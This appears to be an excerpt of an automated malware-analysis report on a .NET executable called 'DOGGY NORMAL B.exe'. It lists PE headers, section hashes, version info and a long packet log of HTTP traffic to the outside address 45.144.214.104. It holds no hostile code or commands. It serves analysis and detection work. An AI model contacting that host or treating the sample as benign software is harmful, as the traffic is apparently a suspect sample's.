add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5584	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x5d6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x35e4	0x3600	8a68b295e654eb30dfd946fd182cf7e7	False	0.46947337962962965	data	5.722557559096033	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x5d6	0x600	c44bc2e194956c1896cdfebb25e5cf86	False	0.423828125	data	4.196391202132952	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0xc	0x200	0963ac9c7b8bebe5f3ef17f113d66162	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x60a0	0x34c	data			0.41706161137440756
RT_MANIFEST	0x63ec	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	DOGGY NORMAL B
FileVersion	1.0.0.0
InternalName	DOGGY NORMAL B.exe
LegalCopyright	Copyright 2018
LegalTrademarks
OriginalFilename	DOGGY NORMAL B.exe
ProductName	DOGGY NORMAL B
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 09:03:14.975024939 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:14.980426073 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:14.980539083 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:14.981249094 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:14.986685991 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734395981 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734416008 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734427929 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734460115 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734472036 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.734519005 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.734571934 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734584093 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734595060 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734606981 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734618902 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.734652042 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.734652042 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.735038042 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.735112906 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.740833044 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.740847111 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.740914106 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.740936041 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.789119005 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.865899086 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.865950108 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.865987062 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.865995884 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.866023064 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.866084099 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.872833967 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.872870922 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.872906923 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.872939110 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.872942924 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.872991085 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.878189087 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.878249884 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.878284931 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.878297091 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.878320932 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.878355980 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.878362894 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.884392977 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.884442091 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.884476900 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.884512901 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.884520054 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.884520054 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.884547949 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.884614944 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.889317989 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.889336109 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.889369011 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.889383078 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.945100069 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.997040987 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997061968 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997076035 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997097015 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997111082 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997123003 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.997124910 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997138023 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997152090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997162104 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.997162104 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.997261047 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.997833014 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997900009 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997914076 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.997940063 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.998089075 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.998102903 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.998178005 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.998804092 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.998857021 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.998869896 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:15.998883009 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:15.998922110 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.000030041 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.000049114 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.000140905 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.001751900 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.001770020 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.001784086 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.001884937 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.002213955 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.002350092 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.002372026 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.002386093 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.002396107 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.002409935 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.002420902 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.002432108 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.002432108 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.002444029 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.002455950 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.002496004 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.002527952 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.127945900 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.127964973 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.127979040 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.128019094 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.128021002 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.128087997 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.128103018 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.128185034 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.128196955 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.128328085 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.128346920 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.128359079 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.128387928 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.129117012 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.129127979 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.129139900 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.129184961 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.129184961 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.129780054 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.129791021 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.129802942 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.129832983 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.129923105 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130045891 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.130076885 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130088091 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130209923 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.130314112 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130326033 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130336046 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130373001 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.130456924 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130467892 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130480051 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130527020 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.130527020 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.130611897 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130624056 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130635023 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.130666018 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.131345987 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.131356955 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.131371975 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.131398916 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.131468058 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.131488085 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.131499052 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.131508112 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.131545067 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.132282019 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.132292986 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.132303953 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.132328033 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.132359982 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.132699966 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.132711887 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.132833004 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.132852077 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.133459091 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.133516073 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.133575916 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.133586884 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.133599043 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.133610010 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.133624077 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.133625984 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.133682966 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.133941889 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.133954048 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.133966923 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.133982897 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.134020090 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.259340048 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259380102 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259417057 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259437084 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259479046 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259480000 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.259505987 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.259617090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259650946 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259686947 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.259687901 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259733915 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.259867907 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259902000 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259936094 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.259943962 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.259972095 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260008097 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260010958 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.260265112 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260323048 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.260339022 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260376930 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260430098 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260432005 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.260464907 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260499001 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260545969 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260598898 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.260598898 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.260754108 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260787010 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260822058 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.260848045 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.260951996 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261018991 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.261022091 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261056900 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261130095 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.261168957 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261253119 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261287928 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261322975 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261333942 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.261385918 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.261491060 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261524916 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261559963 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261595011 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261604071 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.261694908 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.261804104 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261940002 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.261991978 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262041092 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.262064934 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262098074 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262111902 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.262134075 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262168884 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262185097 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.262382984 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262394905 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262428045 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262464046 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262468100 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.262468100 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.262497902 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262552977 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.262792110 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262859106 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262871981 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.262906075 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.263094902 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263128996 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263164997 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263180017 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.263247967 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.263314009 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263381004 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263416052 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263430119 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.263448000 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263495922 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263498068 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.263533115 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263588905 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.263870955 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263904095 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263941050 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.263986111 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.264028072 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264060974 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264086008 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.264096975 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264132023 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264164925 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.264393091 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264472008 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264507055 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264538050 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.264540911 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264575958 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264605999 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.264628887 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.264749050 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264803886 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264838934 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264849901 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.264950037 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.264983892 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.265008926 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.265018940 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.265095949 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.265139103 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.320041895 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.391026974 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391056061 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391067028 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391180038 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391191959 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391282082 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.391282082 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.391297102 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391308069 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391398907 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.391482115 CET	80	49712	45.144.214.104	192.168.2.4
